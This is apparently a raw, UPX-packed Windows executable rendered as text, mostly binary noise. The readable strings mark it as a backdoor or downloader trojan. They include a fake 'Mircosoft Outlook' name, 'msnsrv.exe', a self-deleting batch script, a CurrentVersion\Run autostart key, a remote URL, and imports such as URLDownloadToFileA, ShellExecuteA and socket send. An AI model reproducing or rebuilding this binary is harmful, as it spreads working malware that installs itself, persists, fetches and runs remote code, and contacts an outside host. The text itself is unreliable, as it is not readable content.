MZP      ��  �       @                                     � �	�!�L�!��This program must be run under Win32
$7                                                                                                                                        PE  L ^B*        � �� 0      �  ��   �   �    @                      �                @                       �  �   �  
                                                  $�                                                     UPX0     �                        �  �UPX1     0   �   $                 @  �.rsrc       �      (              @  �                                                                                                                                                                                                                                                                                                                                                                           1.25 UPX!		�Fݍ�J� ��  �!  b  &  # �l��%q@ ���2� �d��p���d�A���A���Ad���d����qd��'�p���ͭ|P�0P�e�  ����S��S�����{����[�R8!;������t
�4		ð�Ҍr�8u5�����t2��tP�� <Y{'�9�#�9�o�t�Q1�j1�ޚ�
��d�SV�����oʀ��=` ��֋�2�ݻ��u%x��� ���w
3�k����Ê�@A	-!�^�쿻B'�$z��PRQ:Mv�s��}ZX�1��Ș��?Z�=��=� ��}g�W9�t����W�Ɖ�w	�t1��|9����,:�f�m�w ��08���������N)�)���I��x	�����_^�WU��Sv���	��< v�;"u�{Ͷ������3���C<1+<��5�+��;"u�o+l�>&^w��d���Ƌ���ߋ>3��Q782����;�v��7CF
w�`t���-g��w.�]_��������ڋ������|��uhF�D$Pj ���$�ȋ�h�L���Ӌ�{�Vv
�3t�~N��P�gn<_<ar<zw,�k�3Kf�Cf=����v�f��~;+taHf�s��޸dH _�{�Cj��xSA��(��{�ef�����۶}ov�C��	Po.��t`�Fu��^���mu(@����=��QA�s̀���&jV@�)��#�"3҉SZ��k��TH�QK��l�]k�87Ԅq���V�1�F6mo�F-��_Ht .��?�������F\��H'��'@x(�GnfB�$� ���6�~O���h���[�Q��FHP\/<������~����݅�f�N'�6#l@!�n��-�s�jJPsǚ��[��W`��L��>�OR �ZHQ�6��sk��0@��jI�r)�=�Huv�x�m�=��,��ϗ��[5��t�(��m����cu��M��t���lt9α%PdE3��T�����R�T�F�i�fS����xon3ɺ��썃]���
g�Ӡ��u�f����4�6�PčSHY�r8>�<�DH{B�n���	H��If���7]j�����3��=�a#���F�=��gh�{,!G�P nE.�����Q��ݛ�����E�S#�;�uX0:���E���PW��U��ʹ|V �?4�=����s
�����U�g�#;u�t/ܲ�X��>K�Y]� �&]h����h�hp�jd�|[�y�f��xe,'wS�3��/*���w)f%.	�g���2��
$���ty����$Ⱦw�ڲ��W���U{X�v)X# �
l�lH�5϶��0j5�y��J�ǈ͝��t�����o�a����_s(��e��*
Z��V�[��I։�1q��������0����&m/��ފ{O����뭒$CT���t`.�|�p������c�\L��t!EG5��ZAhGKf	��b�hB�s��Ct$��0sl�����t���޸���˘�U_'��	���!v����JQ�,�	4Ñ
���&��@.�w�A�!_��1��?qF��Ê��R����=s�1�l�
q�_���K���0C������}�-C�G�L$�������~�)�~ O�� ��D��GK����u������ {��
p��P�l[�}�b�� �F t��������-tb+t_$xtZX����tU0u'HC���n�բ-�S	wC�K�%9�w!���)�/�}���t	i}u	F�W���~ExC[)��A�� �� m�vl*t�A�I_�� LwЀ�a��
WɞU�Y1��2�Uz���#tV��u�ss��:L�{ �,�I�\=i÷���"xC��������t5�xx�P���P+P9� )�PQ��7���P�YX��K����H��!�t�m�wb�@~d%@2�@t�����W?�X��R��  a�4����L�#��C/p�H,$�$
�f�?�KGXr/`�Z���[���9�t�����u��AA���|�7�O��=gv4QTj���y����YDK��p{��T$���Og�J�B&��П��jQ@$����������U��x�G�����_�pK~K�x{sw
D�Y����]����P���˸�_; �������;�~3��E�-�P7�X���t%t���n��Z���2�v�g�T��2��ɋ������"k��	���4��/��iuw{[�����/�x�G}� ��^rG�@�_>��F�o�w�7�=��V����������5� x{(C�?���� �CC�u[�P�|P*��-Fۃ>|$[���vt"J�k�n7�S�;�{�F�@2(u�<�|��}A.�;p`�`�5�2VY��o��^�/�W�����.��鋇��oDZ� *�I|��.к�B��4X�.5�d��)��ÞI(��Nu�5��'#!A������<��XH���mm#���6�zJ�t� �C	~)\X�E~Z���~/k��PZPD�(����Z�P��@���8k�ů������n]��	���أ�:V�;�R���jR��ZCɊ
B�ֵ��W��T�u��Xh��J���L�ݶ�ð?�}������y�y�V��9v;@�΁�w�N���~u�~�}����CaA�;t\;}���6v��Bn���WӉΥ�Fhǎ�]���K���bS����X����O�EpF"�����P��P��S1���9�?XkS�	A�9��R׽ Ju�Km�>�v��om�?W7K��E�6��Dl��H�΂�k��'�8�݈J��w'Z�X�$����0l�&���~/�k�hik��W��wFo���R�t&�E9٪�[��J��_K��ۭ�����
�L[\Z�q+8z�eA8�u:��& T�{-X8'I��k�`�jZ03J�w-�����a�pԟP�Ba?]�� ��"���7t1SiÒ
��P��X�H@�akc
[XÉ��7��wT-�X��&J|9�})�n�|���[���������0�1�[�@�~��1O�O�W~Jx�F�%Yټ��v�a��wA�Z�d*�,;�!A����/ݵ[L~H�V#�xVu����j�	��LXr������p��z�(ȏ��-1h��9�|L���k�ѕ:��h�{����)��@Y��[�6Ï���x��F��rC�/@{!�0����4$���h@+u�<
�V>���?���ޣo;m�J�~��T�\M�u�UUh�@��Id�0d� ��P�#��e,�V�Z�$��/���?�L��]G�-6s#���W�٣�e� {)��G���ģ/Pj@G�������,�6~pfu�œ�l�p\�e�84�K���B�)^D�cl�s��u&d�P����
6<4+<�M�Ju{�����KR�P�x�c�3�1#,�x[�F.���P�����4��>�(_��<1&|fH8&��b C-�@d�7i��G��p��%4d��N�0,(�A$�|Adxtpd�lhd`d�A\XTd�APLH�AD@<Ad���d�����d�A���i�IW�i�� $SQR�%8R�0l z�KB��'�ȑ<�'�(�<�K�(�6Ȍ����2� ���2� �����!�����Jd@��rI�l���(�Dd�7�D�p5k�f�l��.�Kd�|� v�˖��S��oo�3� 6C;�|x��j����6�!�Q����)Q!��U�s�yB��>� ��&�C����o��C��z�Iu�Q<�R� W�+2ݻ/�"e����$��F��f�u�1*e��#L�l+2c`�xn�������B�{ݹg�ͦ�T�d�v��3���B.y���&��,,����B�(���(��@�gJ@�)Y.�PP�v�K��`0�p!�\ p�v�,�/����0#6�\� �x�/2�	�� �����+ܺ	<%�p�(�[��w %�B#ps=e�0m480�`�`=#r����=5577�uin=10_{�8OuDoor��-sLO�iq=0?��ߚr>Mircosoft Outl4k�_{1emsnsrv.exe�/K�Od=S���"?M�U�������td�A����'��뾘���o.B�\a�X9;������9�~��m�ͣ��mh�P��J�X��Z4l�F�ႛhxU�	}{�ٯ�v$h ���;�<PV`j
 ��&\j@�۵��P$s��w�F�	 ZI��%ocK��hA��>�五�0s�}�����<L��
 ]<����38����<SPp@�b��.�H��v.@������a��!��MAINIC���ON �1�Z���vuVf�Տ��8����|�� ��?ut��؋8��[��j�!G�6/xtY&�0W����I�ax���=�7��/�S��`��so��Th�_lj�
\��IfǄ$��t�f�4��S<f�A6��j�$����,j)h��d�]�^D��6s���#V|�<�9��Q�|×=$����� uK�����_�����c �^#&�].���L�􍍕A��.�)38L�*R;���9i� P���~3!�ȃ��33N�� ����g�o��F��<�w�S��(Sփ�A~C� .:;kk݀w��a�T�:=���mp2�
K� ȓ(8:d�&�O䄱ߋ�� hD+�4?[x� �7H�� �{��&��Q�M2Pr�,����l2�+�!�,5�P\(��:9���v�� ����@� G�\�;t�h����d���Ȩ� d���hۓct��9dK��@� t�A��;ɼ䒁������(a�/�5H{j�7ɴ�
�hm�Ö1�}�����:��:� g��9�!N
��~rӌ���MK�Ұ�gO�&�|�h�:��h�QBd�!OH�\2 ط�	�Y�8 �ݑx��L�hT�| /�B��T0<0�ٴ?�^������HX!}Х�T� ;��9�#;8��+�Q����5+1}�4@&+��<��ﾼy����
��
;�u#!ۿ۪� �yK�� ��C�Xl� � L��A�1�/���|&Cٴ�ލ�3騊n���^&�FKu��H;�J� �\����2��\h,�������3����
B@���l�Y�L([|��	dJ;�~(;����-���	�dy3��; ��Z&4/��!u�,�9[R��i�`0�0`�^d�r��PWD�n�okerror
�<�/DRV
{/�SZEtO��RUN?ELMKD˾�d#WITMP/����IR00215.0�8�0{ULL[�[v`]�F'�%��KRK�.�M�'C+S��KEOF�EM���I�;Xh<��y�HE�	�fd�I���y1��;��)ރ-Z��;�T����޲xn������Qر���4
���f��J%�+������}��P��5P���s1A^W+�@������g���S�M����7�CH��<X8�SaSl�n�f�,�x�2��8x�<�R�Y���m�/�Cw�?�t�-�0�,b�=��� �(��tY�W�ܳ@��Q������4B�
L���#ۺ�*�Z��#h�m �{6�� �@$g/�ג�gG@#ρ<,�2$�.r�0ȩ:r!;�m!�:�H.y�ɖ� �����9!����$#� LE�2��ܒ����ȁ\������[@I�Mo(>�tt�ˍ��`����Iz�0<C�X�ԧ&���N�.bat?��ds:1Erase "�f�I"'
If exist��s Goto 1O��)�22-�xi7STWA1\Micr|���\Windows\CupentV!�wsion\Run�Q�R��ԇ\SV�nȧQ��B%ՈC⺘B=��ڠg�U�T���I�#��%&��:Z�l7��P�'�ED�~#��M4v�Db���(ŷGZ�TCNu�ȕl�:��栅��=~�=���i� ��=f��*�7v	L�f���"�Щ��`t�h��hG�����;@�ع�t벹���I����԰�e���x�ΕsƩ�DL����˫�ހ��@)W�7,@�SG; ��S<,/CK��j#��C.��+�6C��+_�SZ�B�!���LV�
�%O�D�%"�YSj�G����3���ڻl0@�U�1Г��W�����d�`�m�
�	k?���@DM�
g/��J�D���b6�	� �����>����kV�k��6M����w��1�DG�"�!�[u��DJ*��v
���6����']�*��N�_ݛ�E1��Jh$E'ro�m,�h4i#����
 �T7^�����KERN����32.8L?Reg��mnSv�ePp��֏ss �����l�N	���_�	�ȍ��Ⱦ�_��F7ˀ|�m~�\t� G/V��&OG�G��h
�0�u�-C�	u�����x%b�gG6��w��V,���h8��$�1z�F�V��2@|l��h0Gbڐ�0i3^�C�
L<��s�G������$f����'c ����F�;e> uX\�*.* *d��|C��4ʣO�-�U��GMj	3�"���hʽԣ\���4ĹG��ޒ���
1ݒ{�KH�\
���l���?�f������F�J�`uL�&��mo��dIѕRU9�b4�� ƪ� c�$���IJ$���KT y�Iؼ�N�JؾP���K�T�h��(���|1d#HU	K�X ���l5�."KM��M/�hR_p躒/��|亐຤�&��܄�M�a-y���~�,Y�m������-X�e���Ԩ��$պ7�2�k�F��+���[W�yG,��_http��://6web.?�o�~q.com	/wwp/msg/�9	, a���.Jml���V�&Name�Z��=	�!@,��=y���%'�kN\hN,�%�\hC71�C	�J\T<e�l�&�$�t&f�,�D�'� (�˦隰�踤;8���5C�^S$N@��/�LN��!�ĕqO(�lC#���!(��ގ �	0��4�/ܸ沛K�ظQ�.���Ը�и��9G�%xOкf� ##� �{G �����2�.��d0$ �����o����������������������Iw�G_s�F�O AA�} ��*H�A@�@ 	`G�9�s`)((�D D V C L A�fs7 PKG E I N �[
�F OmM�0��CN�@QX"=���&=O87��$B�:��
}kE��s� 3M��nE�agA�So���y�m�Init�'QmK� UTyp$f�7[�Sock	?%����e ?ma
for:2functP-Q�s'`60��<a���7�ExecLoadLibraryAG����Dirtof��aTpPath�
�"�1oAddrCModuleHa��YkN!kgicalDri ��nStngs=�j�ZId�X{�F�Next<���rsClo�
���^TimeTo\����D(D�Z���ih#De̵�TC�%�Co`7��py9�` ��}�{Th0d��a�E�;RaW�[;v�`
Se�Po�r��ncE�OfRtlUnw�+�9
VL�'��ZOJpG{te�|�dSPGSizòى���(���3�mmLk���Tls�V9ueG�#$OAl=c�Wԛ�e��`l�veLH���ۂp	�IxAX�T'�m�ٝ�$,g��}��AO�nKey��b�!�!4�{�V����c�Sh5l�ut�����O�URL"wnl
,p��^���nrC�f  Qa�1r[���lm.؛�^X>7z-+|Z`Ic�
�Mht;s$??�;`��D2pPchefQ�%�0!��N��ؠChn*ڑ��޴SAlk��0nup3"t�Asy�]l����s�eewr�v�evl�kht�z|ncl!biac�C���PEL ^B*F���� �� Z��}�)&0@I7�3��|gn4@3	��]6 p���m �b�O��r����`�CODE�?����ېg `DATA�,w,�D':�BS� ͱSva`Fn��O�.ida�p'�ֹ�@HsW �M�ONr����N�N�P'e�K���P'sr&�����V'�q   �L�     �`� �@ �� `��W�����������F�G�u�����r�   �u�������s�u	�����s�1Ƀ�r���F���tt���u�������u������u A�u�������s�u	�����s���� ������/���v�B�GIu��c������������w���L���^����  �G,�<w��? u��_f������)�����������ٍ� �  �	�t<�_��0�  �P������  ��G�t܉�WH�U����  	�t���������  a�{��<�@ @�@ pf@                                                                                                                                                                                                                     ���0          (  �
   h  �   �  �    ���0          @  �    ���0         X   T�  �              ���0        ��  �& ��  �    ���0           �   ��                 ���0           �   �  p               ���0       > ��  �    ���0            �              D V C L A L  P A C K A G E I N F O  M A I N I C O N P�  (       @         �                  �� � ��) ��� �º ���                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         �������������������������  �  �  �  �  �  �  �  �  �  �  �  �  �  �  �  �  �  �  �  +�  ��������������������x�            �               ��  ��              ��  ��              ��  ��              ��  ��              	�  ��              �  ��                       �  .�  >�      L�      Z�      j�      ~�      ��      KERNEL32.DLL advapi32.dll shell32.dll URLMON.DLL user32.dll wsock32.dll   LoadLibraryA  GetProcAddress  ExitProcess   RegCloseKey   ShellExecuteA   URLDownloadToFileA  LoadIconA   send                                                                                                                
